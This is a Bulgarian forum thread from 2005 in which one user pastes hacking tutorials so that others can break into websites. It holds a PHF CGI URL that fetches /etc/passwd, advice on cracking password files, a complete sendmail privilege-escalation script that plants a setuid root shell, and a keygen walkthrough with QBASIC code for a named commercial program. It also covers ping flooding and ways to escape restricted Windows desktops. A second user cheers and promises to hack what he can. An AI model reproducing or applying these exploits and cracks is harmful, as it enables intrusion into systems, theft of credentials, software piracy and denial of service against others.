Лесният начин да го направите е да стартирате Object Access Auditing на машината, която сте открили, че продължава да бъде инфектирана.
Успех!
freaker
Oct 4 2005, 04:38 PM
Мисля че това ще ви се стори интересно:
QUOTE
Хак на web site
E добре гадини! Май много искате да хакнете некой уеб пейдж, а?! Сега ще ви покажем как да стане тоя номер. Не е зле да се поровите из нет-а за други такива материали (можете да научите нещо все пак!!!). Ето сега...
Преди всичко трябва да се ПАЗИТЕ АДСКИ МНОГО защото ако хакнете нещо голямо оттам могат лесно да проверят log файловете да видят адреса Ви и да Ви дойдат на гости АКО това Ви се стори доста сложно минете по-надолу, все ще се намери някакъв начин за хакване, а може и на Вас да Ви дойде идеята. Все пак и сложните неща са направени от прости ))))
oВзимане на парола през FTP
Един от най-лесните начини да направите това е през аnonymous ftp вход в дадена стрница. Сега... трябва малко да научите
password файла.
root:User:d7Bdg:1n2HG2:1127:20:Superuser
IvanIvanov:p5Y(h0tiC:1229:20:Ivan Ivanov,:/usr/people/ivanivanov:/bin/csh
RalicaPetrova:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/rpetrova:/bin/csh
Това е пример за един редовен password файл. Superuser - ът е частта която Ви дава root права. Това е същинската част на файла.
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
Това е още един пример на password файл, но има само малко различие, той е shadowed (затъмнен, засенчен, прикрит...).
Тези shadowed password файлове не позволяват да се види или да се копира истинската криптирана парола. Ето това вече създава
проблеми на кракера на пароли и diction maker - а. Отдолу има още един пример за shadowed password файл:
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/
false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Затъмнените password файлове имат "х" на мястото на паролата. Сега ще си поговорим как да я кракнем.
Кракаването не е толкова сложно както изглежда, въпреки че файловете се променят от система към система.
1. Първото е да копирате или да си свалите файла.
2. След това трябва да намерите някой добър кракер или dictionary maker, но е много трудно! Има там некфи ама те са малко...
Малко са добритееее в бранша. Препоръчваме да потърсите Cracker Jack, John the Ripper, Brute Force Cracker или Jack the
Ripper. Сега за dictionary maker или "речников файл"... Когато стартирате крак програмата ще бъдете попитан за thepassword файла.
И ето сега за какво ни е dictionary maker - а. Какво всъщност е той? Това представлява програма, която комбинира всички
възможни комбанации с букви (ASCII, главни букви, малки букви, могат да се добавят и цифри). Такава програма можете да си
намерите навсякъде. Отидете в astalavista.com... а и при нас има такива програмки. След като вече разполагате с такава
следвайте инструкциите на програмата.
oPНF Техника
Това е един страхотен бъг, но повечето сървъри вече го усетиха и го остраниха. Това е най-простият начин за взимане на
парола, но става само в 95% от случаите, кофти... Единственото което трябва да направите е да си отворите browser - чето и
в полето където трябва да въведете адреса пишете:
http://nekav_web_site/cgi-bin/phf?Qalias=x...t%20/etc/passwd
Например ако желаният сайт е mailpd.com в полето пишете:
http://www.mailpd.com/cgi-bin/phf?Qalias=x...t%20/etc/passwd
Така си сваляте password файла и си го краквате.
TELNET и експлойти
Ами експлоитите (exploits) са най-добрия начин да хакнете уеб сайт, но са толкова сложни както проникването през FTP.
За да започнете с експлойта трябва да разполагате с telnet клиент. Това става пак като го намерите в мрежата. Търсете...
Най-добре е да си вземете account с името на сайта, който искате да хакнете. Експлойтите разкриват бъговете и грешките на
дадена система и Ви позволяват да придобиете root права.
Има адски много експлойти за такава работа и пак трябва да се поровите малко... Ето Ви тука един известен като sendmail.
Всичко се прави през telnet:
cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" "
-f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
Тъй като има още МНОГО информация,ще я споделя с вас,само и единствено ако вие искате.
sLaV
Oct 4 2005, 08:20 PM
Еее фрикер екстринка м'че Сега ще попрочета каквото мога и ще хакна каквото мога
Едит:А за ощето инфо аз съм ЗА
freaker
Oct 4 2005, 08:57 PM
QUOTE(FiFtY^ @ Oct 4 2005, 09:20 PM)
Еее фрикер екстринка м'че Сега ще попрочета каквото мога и ще хакна каквото мога
Едит:А за ощето инфо аз съм ЗА
Радвам се че поне един човек оценява моите постове 10х фифти.Още инфо ще ти дам утре,шот ся нямам много време
sLaV
Oct 4 2005, 10:50 PM
QUOTE(freaker @ Oct 4 2005, 08:57 PM)
Радвам се че поне един човек оценява моите постове 10х фифти.Още инфо ще ти дам утре,шот ся нямам много време
freaker RLZ!
freaker
Oct 5 2005, 01:08 PM
Ето ти още малко"
QUOTE
Как да Създадем Keygen Използвайки SmartChek
Този път ще ви покажа как да направите keygen, използвайки SmartCheck информация.
Инструменти и мишена:
SmartCheck 5.0 или по-висока (може да я намерите на http://surf.to/HarvestR или http://iczelion.cjb.net), някакъв език за програмиране (ASM, C, Pascal, Delphi, …), за да се кодира keygen'a. А за мишена ще използваме DL PageASchedule v1.1 (потърсете я на http://www.zdnet.com). Тази програма е кодирана в VB5, затова е перфектната мишена за SmartCheck, един от добрите Numega инструменти. Инсталирайте я в избрана от вас папка и я заредете, за да я разгледате. Виждате досаден прозорец показващ сериен номер и регистрация със съответен ключ. Серийният номер и ключа са различни за всеки компютър (базирани на ID харда ви или нещо от сорта). За моя компютър си имам този сериен номер: 554-370-524.
Подготовка:
Заредете SmartCheck и се уверете, че сте конфигурирали следните условия: кликнете на "Settings" от менюто Program и след това в етикета "Error Detection" - всички позиции трябва да бъдат избрани, от етикета "Advanced" (от предишния етикет) - всички избрани, освен последните три най-отдолу и най-накрая от "Reports" - изберете всичко освен mouse.
Зареждане:
Сега сте готови да започнете. Кликнете на иконата "open" и заредете от папката, където DLPager е инсталиран. След това кликнете на "play" бутона (зелената стрелка от toolbar'а).
DLPager е зареден. Може да видите досадния екран със серийния и три кутийки за въвеждане на регистрационния ключ. Серийният номер се създава от вашата hard drive информация и е различен за всеки човек. В системата, която ви представям ще използваме серийния номер който имам: 554-370-524.
Вкарайте произволен регистрационен ключ, аз използвах 111-111-111 и кликнете на регистрация. Програмата ви извежда съобщението "Invalid Key". Кликнете на бутона ОК, след което в SmartCheck съответно на "stop" (червения квадрат от лентата с инструментите) и се съгласете да спрете изпълнението на DLPager.
В левия прозорец на SmartCheck може да видите дълъг списък с резултати. Но повечето важна информация е все още скрита. Изберете от View "Show All Events".
Сега вече имате достъп до всички функции и инструкции използвани от DLPager. Нека вече се захванем със сериозни неща като
Четене на кода:
В този дълъг списък с инструкции трябва да намерим къде нашият измислен регистрационен ключ се сравнява с верния, затова скрулираме по списъка, за да разберем как ИСТИНСКИЯТ регистрационен ключ е създаден.
От менюто Edit избираме Find. Въвеждаме ключовата дума "invalid" и след това кликаме на "find next". Знаем, че нашият регистрационен ключ със сигурност се проверява точно преди прозорецът със съобщението да се появи. Намирам я на ред 8475 (може да бъде различен на вашия компютър):
«__vbaVarDup(VARIANT:string:"Invalid...»
Добре, ако скрулираме по листинга може да видим един много интересен ред:
«_vbaVarTstEq(VARIANT:Const String:"",VARIANT:String:"866434184"...»
Номерът 866434184 МОЖЕ ДА БЪДЕ различен на вашия компютър. Но това прилича на ИСТИНСКИЯ регистрационен ключ, нали? За да сте сигурни, просто стартирайте DLPager (директно извън SmartCheck) и се опитайте да въведете номера, който намерихте! Bingo, намерили сте вашия номер
Но не искаме само да имаме серийния, защото той ще работи само на нашия компютър, а ние искаме да можем да го дадем на някой друг. Затова трябва да разберем КАК този регистрационен ключ е създаден. И така, нека разгледаме листинга отново.
Как се създава този регистрационен ключ:
Само няколко редове по-нагоре (за мен това е ред 8449) ще намерите интересна инструкция:
«__vbaVarMove(VARIANT:String:"86643418..",VARIANT:String"86643418"»
Гледайки в десния прозорец на SmartCheck (информационния прозорец) ще видите стойността на променливите: : 866434184 и 86643418 (моля не забравяйте, че вашите числа могат да бъдат различни). Инструкцията vbaVarMove (и на предния ред vbaVarTstEq) е само за добавяне на нова характеристика към string'а… Добре, сега вече сме на последната стъпка от създаването на ВЕРНИЯ регистрационен ключ, където последния номер е добавен.
Скрулирайте нагоре, докато не намерите първата стъпка от създаването на този ключ. За мен той започва от ред 7983, точно след теста за дължината на нашия фалшив ключ (111111111).
Сега вече можем да видим какво точно прави програмата. Най-напред се взема първата цифра на ключа, която се зарежда от програмата (554370524), използвайки инструкцията:
«Mid(VARIANT:ByRef String:"554370524",Long 1,...»
Може да видите, че тиретата в номера са премахнати. Веднага след това виждаме друг интересен ред:
«Mid(VARIANT:ByRef String:"HabXndJf...",Long 1, »
ако погледнете в десния прозорец, ще видите пълната стойност на string'а, който е «HabXndJfiqPmKla». Нека продължим надолу с разглеждането на листинга на кода. На следващите два реда се дава ASCII стойност на първия символ на ключа (554370524), а и на този странен string:
«asc(VARIANT:"5") Returns Integer:53»
«asc(VARIANT:"H") Returns Integer:72»
Точно след тези редове се натъкваме на наистина странна инструкция:
«str(VARIANT:Integer:8)»
Хммммммммм от къде идва този номер? Ако погледнем по-надолу, ще видим, че за 9 числа от номера, подаден от програмата, ASCII стойността се пресмята и същите неща се правят за всичките девет начални символа на "странния" string. Всеки път се появява нов номер и се прибавя към предишния, като по този начин се образува крайния номер на ключа….
И така, почесах се по главата, изпих едно силно кафе и започнах да използвам въображението си (до голяма степен то ви е необходимо, за да краквате или както се казва трябва "да почувствате кода"). Спомнете си първия символ от регистрационния ключ (8). Имаме два ASCII стойности: 53 и 72. Е, тогава нека прибавим цифрите, за да получим тази стойност 5+3+7+2=17! Сега нека отново прибавим всяка една от цифрите 1+7=8!!!
За да сме сигурни нека проверим теорията със следващите няколко стъпки: за втория символ на регистрационния ключ ичач asc(5) и asc(а), които са 53 и 97. Следвайки теорията ми имаме 5+3+9+7=24 и 2+4=6!!! Вторият символ на ВЕРНИЯ ключ е 6, отново потвърждение
Но за да сме абсолютно сигурни, проверяваме и третия: asc(4)=52 и asc( =98, следва 5+2+9+8=24, а 2+4=6 и виждаме също, че 6 е третия символ от ключа……значи сме открили трика ))
Алгоритъмът:
Знаем, че всеки номер от подадения ни от програмата сериен номер (в моя случай 554-370-524) ще бъде свързан с всяка от деветте първи букви на string'а "HabXndJfi". Тогава asc стойността ще се сумира и всяка цифра от нея ще се прибавя, докато не стигнем до едноцифрено число. Също знаем, че странния string (HabXndJfi) разбира се също ни дава същите asc стойности. Може да дефинираме тези фиксирани стойности (нарекох ги "магически числа"):
H=72 --> 7+2=9
a=97 --> 9+7=16 --> 1+6=7
b=98 --> 9+8=17 --> 1+7=8
X=88 --> 8+8=16 --> 1+6=7
n=110 --> 1+1+0=2
d=100 --> 1+0+0=1
J=74 --> 7+4=11 --> 1+1=2
f=102 --> 1+0+2=3
i=105 --> 1+0+5=6
А, сега можем да създадем крайния регистрационен ключ.
Основният алгоритъм:
Ключ номер 1 = сумата от всички символи на ascii стойността на (серийният номер 1 + магическото число 1)
Ключ номер 2 = сумата от всички символи на ascii стойността на (серийният номер 2 + магическото число 2)
Моят пример:
За сериен номер имам - 554-370-524
Ключ номер 1: ascii за "5" е 53, 'магическо1' е 9, сумата е 62, ключ1 е 6+2=8
Ключ номер 2: ascii за "5" е 53, 'магическо2' е 7, сумата е 60, ключ2 е 6+0=6
Ключ номер 3: ascii за "4" е 52, 'магическо3' е 8, сумата е 60, ключ3 е 6+0=6
Ключ номер 4: ascii за "3" е 51, 'магическо4' е 7, сумата е 58, ключ4 е 8+5=13, тогава 1+3=4
…
Вече имам регистрационния ключ: 866-434-184
Кодът keygen
За целта съм използвал QBASIC. Между другото може да създадете свой собствен keygen, без да използвате моя листинг Ще ви дам само част от кода, където се изчисля keygen'а:
...
INPUT "Въведете своя сериен номер (без -) :"; serial$
FOR i = 1 TO 9
REM *** Изчислява се сумата на числата от ascii стойността на всяко число от серийния
c1(i) = INT(ASC(MID$(serial$, i, 1)) / 10)
c2(i) = ASC(MID$(serial$, i, 1)) - INT(ASC(MID$(serial$, i, 1)) / 10) * 10
regcode(i) = c1(i) + c2(i)
REM *** Проверява се дали резултатът е повече от един символ, ако не е се изчислява до един символ.
IF regcode(i) > 9 THEN regcode(i) = INT(regcode(i) / 10) + (regcode(i) - (INT(regcode(i) / 10)) * 10)
NEXT i
REM *** Сега се прибавя "магическото число" към всеки номер от този регистрационен код
regcode(1) = regcode(1) + 9
regcode(2) = regcode(2) + 7
regcode(3) = regcode(3) + 8
regcode(4) = regcode(4) + 7
regcode(5) = regcode(5) + 2
regcode(6) = regcode(6) + 1
regcode(7) = regcode(7) + 2
regcode(8) = regcode(8) + 3
regcode(9) = regcode(9) + 6
REM *** и се проверява дали всяка от новите стойности е повече от един символ...
FOR i = 9 TO 1 STEP -1
IF regcode(i) > 9 THEN regcode(i) = INT(regcode(i) / 10) + (regcode(i) - (INT(regcode(i) / 10)) * 10)
NEXT i
...
Сега трябва само да запишете деветте числа във следния формат ххх-ххх-ххх и keygen'ът е завършен.
Надявам се, че предложената от мен система не е била твърде сложна и неясна ))
Интересни DOS команди
Под DOS можете да направите много неща, които не могат да станат с обикновен Windows 9.x (без допълнителни програми).
Тук ще разгледаме някои DOS команди:
1. Ping - под ping се разбира изпращането на Echo Request до друг компютър в мрежата, за да се разбере дали тодй съществува.
Щом другия компютър получи такъв пакет, той е длъжен да отговори на подателия му. С тази цел в DOS е създадена командата
PING. Нейният най - опростен формат е: (параметрите в квадратно скоби не са задължителни)
PING [-t] [-n брой] [-l големина] [-i време на живот] [-w милисекунди] адрес
Параметрите имат следните значения:
-t - ако е споменат ще се пращат безбройно много пакети докато не бъдът спрени с Crtl+C
-n - това указва колко пакета да се пратят (по подразбиране е 4)
-l - указва големината на пакета (по подразбиране - 32 байта)
-i - тука моджете да кажете през колко рутера или шлиуза максимално да може да мине вашия пакет
-w - колко милисекунди да се чака отговор от всеки пратен пакет
Ако програмата ви даде съобщение "Requested Timed Out", това означава че или този адрес не съществува или пакета не
се е върнал (за по-сигурно пращайте по повече пакети и задайте по-голиам период на изчакване за всеки)
Пример:
PING -n 10 -w 10000 212.50.21.123 - това ще прати 10 пакета до 212.50.21.123 като всеки ще бъде изчакан
10 секунди
PING -t -l 5000 212.50.21.123 - в този пример се пращат безкрайно много пакети с големина 5Кb с цел "наводняване"
на връзката
След като изпйлните командата PING ще получите нещо от сорта:
Pinging 212.50.21.123 with 32 bytes of data:
Reply from 212.50.21.123: bytes=32 time=1010ms TTL=126
Reply from 212.50.21.123: bytes=32 time=982ms TTL=126
Reply from 212.50.21.123: bytes=32 time=1256ms TTL=126
Reply from 212.50.21.123: bytes=32 time=817ms TTL=126
Ping statistics for 212.50.21.123:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 817 ms, Maximum = 1256 ms, Average = 1016 ms
Както видждате най-долу има статистика за това колко пакета са били пратени, колко върнати и средното време, за което са
го направили.
2. Trace - тракинг се нарича проследяването на пътя до даден компютър (през кои адреси минава). Това може да се направи
по следния начин в DOS:
TRACERT [-h OPITI] [-w MILISEKUNDI] ADRES
-h - брой опити за търсене на отделните адреси (по подразбиране 3)
-w - времто за чакане отговор на пакета
3. Netstat - Състояние на TCP/IP това е програма за показване на текущото състояние на TCP/IP, тоест за извеждане
на информация за това кои портове са отворени, на кои има осъществена връзка и т.н.
Няма да ви обясняваме параметрите и. Просто я използвайте по следния начин:
netstat -a
това ще покаже цялостна информация относно TCP/IP
При не съществуваща Интернет връзка ще видите:
Proto Local Address Foreign Address State
Proto - това е протоколът, с който е осъществена връзката
Local Address показва на кой порт е свързана вашата машина
Foreign Address - портът на отсрещната
State - показва състоянието на връзката (в случайя портовете чакат за Connection Request)
NETSTAT е удобно средство за откриване на троянци при положение че знаете на кой порт работят. Да кажем че NetBus
изплзва локален порт 12345 следователно ако състоянието на този порт е Listen явно имате зареден троянец
освен ако не ползувате защитна програма Firewall)
4. FTP - клиент за File Transfer Protocol Serveriсе
Чрез FTP.EXE можете да осъществите връзка с FTP компютър. Това става чрез:
FTP ADDRESS
Например: FTP 212.50.21.123
Ако нямате определен account в отсрещната машина пробвайте да се свържете с UserName: anonymous и parola: вашия e-mail
След това най - използуваната комада е: HELP
Нагоре
Премахване ограничения за достъп
Това са няколко начина за локално хакване и добиване на достъп ако самият той е ограничен. Това става само като използвате
един обикновен продукт на Microsoft (Tези примери са за Microsoft Windows 95/98)
Отворете Miсrosoft Word (или Excel, Powerpoin, Access, Outbook). Изберете от менюто "Help", и изберете "Microsoft on the Web".
Сега си изберете/стартирайте някоя от връзките (link). Това ще отвори Internet Explorer. Там където пише "Address" (URL)
напишете C:\Windows\Explorer.exe и ще се отвори Explorer.exe. Сега Вие имате достъп до устройствата на машината и всякакви
share устройства.
Отворете Miсrosoft Word (или Excel, Powerpoin, Access, Outbook). Изберете от менюто "Insert" а от него "Hyper link" (или го
изберете от лентата с бутоните) Там където пише Link to file or URL: напишете C:\WINDOWS\EXPLORER.EXE (ако искате натиснете
"Browse" на "Files of type изберете All files" (*.*) изберете файла Explorer.exe и натиснете ОК). При стартиране на
създадения линк вие отваряте Windows Explorer и получавате достъп до устройствата на машината и всякакви share устройства.
Отворете Miсrosoft Word (или Excel, Powerpoin, Access, Outbook). Изберете от менюто "File" а от него "Open" там където се
показват всички директории и файлове натиснете десен бутон на мишката и изберете "Еxplore" Taka получавате достъп до
устройствата на машината и всякакви share устройства.
Изчистете Desktop-a от всички прозорци и натиснете бутон "F3", ще се стартира "Find" с което Виеможете да търсите Еxplorer.exe,
Command.com и др.
Одитете върху бутон "Start" натиснете десен дутон на мишката и изберете "Explore". Taka получавате достъп до устройствата
на машината и всякакви share устройства.
Натиснте на клавиатурата бутон "Windows key" (бутона между Ctrl и Alt) и натиснете "Е". Ще се стартира Windows Еxplorer.
Натиснете бутон Start от него изберете "Help" от там изберете "Search" и в полето напишете "Control Panel" след това изберете Dail-Up Networking Step4 и натиснете в дясната страна връзката "Click here" (от там можете да си позволите достъп до компютъра)
Отворете Miсrosoft Word (или Excel, Powerpoin, Access, Outbook). Изберете от менюто "Insert" изберете "Object" от него изберете
"Create form File" в полето напишете C:\WINDOWS\EXPLORER.EXE (ако искате натиснете "Browse" за да намерите желания файл),
натисни "ОК" и ще видите че избрания обект е вмъкнат в документа. Двойно натискане върху него стартира Windows Explorer.
Натиснете бутон Start от него изберете "Run" в полет напишете C:\WINDOWS\EXPLORER.EXE и натиснете "ОК"
Отидете на Desktop -a натиснете десен бутон на мишката изберете "New", а от там "Shortcut" в полето "Comman line" напишете
C:\WINDOWS\EXPLORER.EXE и натиснете "Next" като завършите shortcut -а го с двойно кликване на мишката ще стартирате Windows Explorer.
Рестартирайте компютъра и когато се испише "Starting Windows 98" натиснете "F8", ще се покаже едно меню чрез което можете да
преминете към различни модели на зареждане на Windows -a (по важни от които са: Safe mode, Commadnd prompt, Step by Step).
Нагоре
L4m3rch3
Oct 30 2005, 09:59 AM
Ето малко и от мен. Предварително се извинявам че е на латиница, но такъв лог са направило
QUOTE
By paparazzix
Няма коментари:
Публикуване на коментар